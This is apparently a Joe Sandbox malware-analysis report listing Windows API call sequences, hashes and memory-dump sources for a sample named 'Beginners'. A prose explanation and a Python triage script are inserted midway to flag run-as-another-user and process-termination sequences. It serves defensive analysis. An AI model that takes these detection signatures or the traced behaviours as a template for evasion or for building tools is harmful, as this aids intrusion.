                                          • Instruction ID: 72c3a32c41246610008dd5ac29b087cb333b1e9377d2129786e335060c866ac8
                                          • Opcode Fuzzy Hash: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
                                          • Instruction Fuzzy Hash: F8F090326197115AE7757B78BC036CA36D6DF42734F20462BF558D53D3EF10898181B1
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000D4282,?), ref: 000D41D3
                                          • GetProcAddress.KERNEL32(00000000), ref: 000D41DA
                                          • EncodePointer.KERNEL32(00000000), ref: 000D41E6
                                          • DecodePointer.KERNEL32(00000001,000D4282,?), ref: 000D4203
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 3489934621-340411864
                                          • Opcode ID: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
                                          • Instruction ID: 261dba7b024c0fdc5b3e94beacceaa28f5641ad83ad9fd6e525d62664e7b8bad
                                          • Opcode Fuzzy Hash: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
                                          • Instruction Fuzzy Hash: 61E01A78A90701AFEB516FB1EC4DB083AA6BB1AB07FA04424BA15D59F0CBF540C5CF10
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000D41A8), ref: 000D42A8
                                          • GetProcAddress.KERNEL32(00000000), ref: 000D42AF
                                          • EncodePointer.KERNEL32(00000000), ref: 000D42BA
                                          • DecodePointer.KERNEL32(000D41A8), ref: 000D42D5
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
                                          • Instruction ID: 0b68b0fa8903023012db8855162bf9af63dd9969355b8662805656461e91d18a
                                          • Opcode Fuzzy Hash: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
                                          • Instruction Fuzzy Hash: 33E0B674950B00AFEB529F61AD4DB543AB5B709B03FD00525F205D59F0CBF445C4DA10
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 000B21B8
                                          • GetWindowRect.USER32(?,?), ref: 000B21F9
                                          • ScreenToClient.USER32(?,?), ref: 000B2221
                                          • GetClientRect.USER32(?,?), ref: 000B2350
                                          • GetWindowRect.USER32(?,?), ref: 000B2369
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          • Opcode ID: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
                                          • Instruction ID: 0fd47c4f944ddf1a8f8046b6201f95e68e999b37d416d987bf7bed15914f156c
                                          • Opcode Fuzzy Hash: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
                                          • Instruction Fuzzy Hash: FBB1383990024ADBDB60CFA9C9807EEB7F1FF08710F148529ED59EB254DB34AA50CB64
                                          APIs
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                          • Instruction ID: 193628e58f177182921f66acb549cf099ad597bf49fc7e22edaeb7ac7efbc00b
                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                          • Instruction Fuzzy Hash: 1461B13150025AABCF19EF60CC81FFE37A9AF05308F054569F8955B293DB35AD85CBA4
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013091D
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013095D
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00130980
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001309A9
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001309EC
                                          • RegCloseKey.ADVAPI32(00000000), ref: 001309F9
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 632ca38ce3853fed778922f1a7ebddaa98a059cb160b23726c66badf246e4a59
                                          • Instruction ID: 85baa0ef3de5f32106c0b2f715d741f0e108754e4b01435b0b814729b8bf45a3
                                          • Opcode Fuzzy Hash: 632ca38ce3853fed778922f1a7ebddaa98a059cb160b23726c66badf246e4a59
                                          • Instruction Fuzzy Hash: 79515731208200AFD715EF64C895EAEBBE9FF89314F04491DF5998B2A2DB31E905CB52
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0010F6A2
                                          • VariantClear.OLEAUT32(00000013), ref: 0010F714
                                          • VariantClear.OLEAUT32(00000000), ref: 0010F76F
                                          • _memmove.LIBCMT ref: 0010F799
                                          • VariantClear.OLEAUT32(?), ref: 0010F7E6
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0010F814
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
                                          • Instruction ID: 28431bb5bc49d096878818ffe847c23633b3592cf29f0a48f4430694888b3c3f
                                          • Opcode Fuzzy Hash: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
                                          • Instruction Fuzzy Hash: 14514D75A00209EFCB24CF58C884AAAB7B8FF4C314B15856AE959DB341D770E951CFA0
                                          APIs
                                          • _memset.LIBCMT ref: 001129FF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112A4A
                                          • IsMenu.USER32(00000000), ref: 00112A6A
                                          • CreatePopupMenu.USER32 ref: 00112A9E
                                          • GetMenuItemCount.USER32(000000FF), ref: 00112AFC
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00112B2D
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
                                          • Instruction ID: bc85813cd64ea27a20f9cc885644c81335735f984e1ebb25a533410317ca34f3
                                          • Opcode Fuzzy Hash: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
                                          • Instruction Fuzzy Hash: E851DE7060434ADFCF29CF68E888BEEBBF5EF15314F104129E8129B2A1D77099A4CB51
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 000B1B76
                                          • GetWindowRect.USER32(?,?), ref: 000B1BDA
                                          • ScreenToClient.USER32(?,?), ref: 000B1BF7
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B1C08
                                          • EndPaint.USER32(?,?), ref: 000B1C52
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
                                          • Instruction ID: 4d7d005e657c30a446e76ec9964c33b7d61684ae3c5bb1d7982e1f425a0e4684
                                          • Opcode Fuzzy Hash: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
                                          • Instruction Fuzzy Hash: 4241A131104200AFD711DF25CC98FEA7BF8EB49760F140569FA99972B2C7309885DB62
                                          APIs
                                          • ShowWindow.USER32(001777B0,00000000,00C055F0,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BD84
                                          • EnableWindow.USER32(?,00000000), ref: 0013BDA8
                                          • ShowWindow.USER32(001777B0,00000000,00C055F0,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BE08
                                          • ShowWindow.USER32(?,00000004,?,0013BC1A,?,?), ref: 0013BE1A
                                          • EnableWindow.USER32(?,00000001), ref: 0013BE3E
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0013BE61
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
                                          • Instruction ID: 2b76070353539d3346690585d8f843c8749dad340638c820c01abdfa2e35ec80
                                          • Opcode Fuzzy Hash: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
                                          • Instruction Fuzzy Hash: D6416C35608144AFDB22CF68C4C9BD47BE1FF4A318F1841B9EB499F6A2DB31A845CB51
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0012550C,?,?,00000000,00000001), ref: 00127796
                                            • Part of subcall function 0012406C: GetWindowRect.USER32(?,?), ref: 0012407F
                                          • GetDesktopWindow.USER32 ref: 001277C0
                                          • GetWindowRect.USER32(00000000), ref: 001277C7
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001277F9
                                            • Part of subcall function 001157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877
                                          • GetCursorPos.USER32(?), ref: 00127825
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00127883
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
                                          • Instruction ID: a1a8375576e0373bc6b8b372cb468e8d61af5b50550e1d9da8aa606f23a9bba6
                                          • Opcode Fuzzy Hash: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
                                          • Instruction Fuzzy Hash: AA31F032108315ABD720DF15D849F9BB7EAFF89314F00092AF99997191CB30E958CBA2
                                          APIs
                                            • Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
                                            • Part of subcall function 00108CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
                                            • Part of subcall function 00108CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
                                            • Part of subcall function 00108CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
                                            • Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14
                                          • GetLengthSid.ADVAPI32(?,00000000,0010904D), ref: 00109482
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0010948E
                                          • HeapAlloc.KERNEL32(00000000), ref: 00109495
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 001094AE
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0010904D), ref: 001094C2
                                          • HeapFree.KERNEL32(00000000), ref: 001094C9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
                                          • Instruction ID: 957291d72ad46f344f91cbc899579d40969127814c1aa9169a62a6bd3cbe8f43
                                          • Opcode Fuzzy Hash: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
                                          • Instruction Fuzzy Hash: EE11EE36500204FFDB118FA5CD29BAF7BA9FB4A312F108018F981D3261C7769941CB60
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00109200
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00109207
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00109216
                                          • CloseHandle.KERNEL32(00000004), ref: 00109221
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00109250
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00109264
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
                                          • Instruction ID: 817c216761bc87652085304c5cf597fc249c4a441375691998918408c9529d4e
                                          • Opcode Fuzzy Hash: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
                                          • Instruction Fuzzy Hash: 7211897610024EBBDF028F94ED48FDE7BA8EF09304F044024FE45A20A1C3B28DA0EB60
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0010C34E
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0010C35F
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0010C366
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0010C36E
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0010C385
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0010C397
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
                                          • Instruction ID: a4956d321eda1fa7cee9d3deb8c9386e046cf4273dbb26d983bc4a2377abdf0b
                                          • Opcode Fuzzy Hash: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
                                          • Instruction Fuzzy Hash: 87014F75E00218BBEF119BA69C49B5EBFB8EF49761F004065FF08AB290D6709D10CFA0
                                          APIs
                                            • Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
                                            • Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0013C57C
                                          • LineTo.GDI32(00000000,00000003,?), ref: 0013C590
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C59E
                                          • LineTo.GDI32(00000000,00000000,?), ref: 0013C5AE
                                          • EndPath.GDI32(00000000), ref: 0013C5BE
                                          • StrokePath.GDI32(00000000), ref: 0013C5CE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
                                          • Instruction ID: 3d84eb51cdec1876087f4b1b93fb1e7b493c370223e3b3608cfe429fe423d5d8
                                          • Opcode Fuzzy Hash: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
                                          • Instruction Fuzzy Hash: 20110C7610010CBFDF129F91DC48EDA7F6DEB09354F048011BA1856571C771AD95DBA0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D07EC
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 000D07F4
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D07FF
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D080A
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 000D0812
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 000D081A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
                                          • Instruction ID: c0398f7881e84b51e4dc1405136f52c78081a1e1e5f6708c777a0719fcf0be52
                                          • Opcode Fuzzy Hash: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
                                          • Instruction Fuzzy Hash: 8F016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001159B4
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001159CA
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 001159D9
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159E8
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F2
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
                                          • Instruction ID: 7c0c834e24880fca3a31c498df34e70bc09ab938c01be9e338db4e0f231b65a3
                                          • Opcode Fuzzy Hash: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
                                          • Instruction Fuzzy Hash: 6DF06D36240158BBE3225B939C0DEEF7E3CEBCBB21F000159FA0591460E7B01A9186B5
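The two function blocks above are the ones behind the report's "execute programs as a different user" and process-termination signatures: one builds an environment block from the caller's token and calls CreateProcessWithLogonW, the other resolves a window to its owning PID, sends WM_CLOSE (0x10) with a 0x1F4 = 500 ms SendMessageTimeoutW (flags 0x2 = SMTO_ABORTIFHUNG), then opens the process with 0x1F0FFF = PROCESS_ALL_ACCESS and calls TerminateProcess. The following Python is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses "APIs" bullet lines of the form shown in this report, decodes the hex arguments against documented Windows SDK constants, and flags the two sequences. The sample input is constructed from the API lines quoted above; the rule names and finding strings are the example's own.

```python
"""Triage helper for Joe Sandbox function 'APIs' listings (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Documented Windows SDK values used to decode the hex arguments.
WM_CLOSE = 0x0010
SMTO_ABORTIFHUNG = 0x0002
PROCESS_ALL_ACCESS = 0x1F0FFF

# Constructed sample input: the two API listings quoted from this report.
SAMPLE_RUNAS = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00109200
• OpenProcessToken.ADVAPI32(00000000), ref: 00109207
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00109216
• CloseHandle.KERNEL32(00000004), ref: 00109221
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00109250
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00109264
"""
SAMPLE_WINKILL = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001159B4
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001159CA
• GetWindowThreadProcessId.USER32(?,?), ref: 001159D9
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159E8
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F2
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F9
"""

# One bullet line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(args)", then ", ref: <call-site address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed '?'
    ref: int                    # virtual address of the call site
    subcall: bool               # True for "Part of subcall function" lines


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)       # also accepts the "-00000002" form


def parse_api_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # section headers such as "APIs"/"Strings"
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def in_order(calls: List[ApiCall], names: List[str]) -> bool:
    """True if the APIs occur in this relative order; other calls may sit between."""
    it = iter(calls)
    return all(any(c.api == n for c in it) for n in names)


def triage(calls: List[ApiCall]) -> List[str]:
    """Apply the two sequence rules this example defines; names are the example's own."""
    findings = []
    if in_order(calls, ["OpenProcessToken", "CreateEnvironmentBlock",
                        "CreateProcessWithLogonW"]):
        findings.append("run-as-user: token -> environment block -> "
                        "CreateProcessWithLogonW (launch under other credentials)")
    if in_order(calls, ["GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"]):
        op = next(c for c in calls if c.api == "OpenProcess")
        access = op.args[0] if op.args else None
        rights = ("PROCESS_ALL_ACCESS" if access == PROCESS_ALL_ACCESS
                  else f"0x{access:X}" if access is not None else "unknown")
        findings.append(f"kill-by-window: window -> PID -> OpenProcess({rights})"
                        " -> TerminateProcess")
    for c in calls:
        if c.api == "SendMessageTimeoutW" and len(c.args) >= 6 and c.args[1] == WM_CLOSE:
            flags, timeout = c.args[4], c.args[5]
            abort = "SMTO_ABORTIFHUNG" if flags and flags & SMTO_ABORTIFHUNG else "no-abort"
            findings.append(f"graceful close first: WM_CLOSE with {timeout} ms timeout ({abort})")
    return findings


if __name__ == "__main__":
    for name, text in (("run-as block", SAMPLE_RUNAS), ("win-kill block", SAMPLE_WINKILL)):
        print(name)
        for finding in triage(parse_api_listing(text)):
            print("  -", finding)
```

The order check tolerates gaps because the sandbox lists only API calls, not the instructions between them, and "Part of subcall function" lines are kept but flagged so a rule can choose to ignore inlined-callee context. Decoding the access mask matters for triage: PROCESS_TERMINATE alone would be enough to kill a process, so requesting PROCESS_ALL_ACCESS is the less discriminating but more common pattern in generic automation runtimes.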
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 001177FE
                                          • EnterCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 0011780F
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,000BC2B6,?,?), ref: 0011781C
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000BC2B6,?,?), ref: 00117829
                                            • Part of subcall function 001171F0: CloseHandle.KERNEL32(00000000,?,00117836,?,000BC2B6,?,?), ref: 001171FA
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0011783C
                                          • LeaveCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 00117843
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
                                          • Instruction ID: c84755ea41505b7cb8554449d2cab382873f615635ebe2038c4368a698a0df54
                                          • Opcode Fuzzy Hash: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
                                          • Instruction Fuzzy Hash: 89F0583A155212ABD7162B65EC8CEEB7B79FF4A702B140825F203A59F0CBB55881CB60
                                          APIs
